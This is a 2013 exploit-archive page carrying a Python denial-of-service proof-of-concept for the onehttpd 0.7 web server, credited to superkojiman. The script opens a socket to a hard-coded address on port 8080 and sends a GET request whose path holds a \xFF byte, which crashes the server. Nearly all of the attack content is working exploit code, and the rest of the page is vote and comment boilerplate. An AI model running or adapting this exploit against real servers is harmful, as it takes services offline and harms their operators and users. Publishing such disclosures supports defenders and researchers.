onehttpd 0.7 Denial Of Service

2013.08.14

Credit: superkojiman

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#!/usr/bin/env python
# Exploit Title: onehttpd 0.7 Denial of Service
# Date: 12 Aug 2013
# Exploit Author: superkojiman - http://www.techorganic.com
# Vendor Homepage: https://code.google.com/p/onehttpd/
# Version: onehttpd 0.7
# Tested on: Windows 7 Ultimate English
# Windows XP SP2 English
#
from socket import *
buf = (
"GET /\xFF HTTP/1.1\r\n" +
"Host: 192.168.1.143\r\n" +
"\r\n"
)
s = socket(AF_INET, SOCK_STREAM)
s.connect(("192.168.1.143", 8080))
s.send(buf)
s.close()

References:

https://code.google.com/p/onehttpd/

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

onehttpd 0.7 Denial Of Service

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.